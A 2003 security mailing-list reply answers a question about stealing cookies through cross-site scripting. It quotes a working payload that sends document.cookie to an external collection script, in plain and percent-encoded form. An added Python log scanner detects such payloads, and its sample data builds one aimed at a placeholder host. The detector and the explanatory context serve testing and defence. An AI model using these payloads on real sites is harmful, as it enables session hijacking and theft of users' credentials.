RE: Proof of Concept Tool on Web Application Security

From: Robert Auger (rauger@spidynamics.com)
Date: Mon Apr 14 2003 - 11:12:52 EDT


>Now I am testing Cross-Site Scripting to steal the client cookies, or any
>other sensitive information. I am working on my own pen-test-testing site,
>which is vulnerable to XSS. I was able to display the cookies of the client at
>the victim’s machine, but that was not my goal, my goal is to get that cookies
>on my machine or any desired location. So is there any way by which I can
>transfer the victim’s cookie or any other information at my machine without
>interaction of the victim.

This is covered in the cross site scripting FAQ located at
http://www.cgisecurity.com/articles/xss-faq.shtml.
The relevant JavaScript code you are looking for is as follows (an example
from the paper).

<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?'
+document.cookie</script>

(IN HEX)
%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%
3d%27%68%74%74
%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%
67%69%2d%62%69%6e
%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%
6f%6f%6b%69%65%3c
%2f%73%63%72%69%70%74%3e

(Note: This website has a public script that can be used for testing cookie
theft.)

Regards,

Robert Auger
SPI Labs
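
Added example (not part of the original message or the FAQ): a log check for the payload shown above, in both its plain and percent-encoded ("IN HEX") forms. It decodes each request target before matching, because a filter that looks only for the literal string misses the encoded variant; the log format, host names and function names are assumptions made for the illustration.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')
COOKIE_SRC = re.compile(r"document\s*\.\s*cookie", re.I)
# Assignments that navigate or issue a request: location=, location.href=, .src=
SINK = re.compile(r"(?:location(?:\s*\.\s*href)?|\.\s*src)\s*=", re.I)

def normalize(value, max_rounds=3):
    """Percent-decode until stable so hex-encoded and double-encoded input
    is compared in the same form as the plain text."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(log_lines):
    """Return (line_no, 'plain' | 'encoded', decoded_target) for each request
    whose target both reads document.cookie and assigns a navigation sink."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        raw = match.group(1)
        decoded = normalize(raw)
        if COOKIE_SRC.search(decoded) and SINK.search(decoded):
            kind = "plain" if COOKIE_SRC.search(raw) else "encoded"
            findings.append((line_no, kind, decoded))
    return findings

def hex_encode(text):
    """Percent-encode every byte, like the (IN HEX) form in the message."""
    return "".join("%%%02x" % b for b in text.encode())

# Constructed sample data: host, paths and addresses are placeholders.
PAYLOAD = "<script>document.location='http://collector.example/c?'+document.cookie</script>"
def entry(target):
    return '192.0.2.10 - - [14/Apr/2003:11:12:52 -0400] "GET %s HTTP/1.0" 200 512' % target

SAMPLE_LOG = [
    entry("/search.cgi?q=cookie+recipes"),
    entry("/search.cgi?q=" + PAYLOAD),
    entry("/search.cgi?q=" + hex_encode(PAYLOAD)),
    entry("/search.cgi?q=" + hex_encode(PAYLOAD).replace("%", "%25")),
    entry("/help.cgi?topic=document.cookie"),
]
```

The match is a heuristic: it requires both a read of document.cookie and an assignment to a navigation sink in the same request, so a request that merely mentions document.cookie is not flagged.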
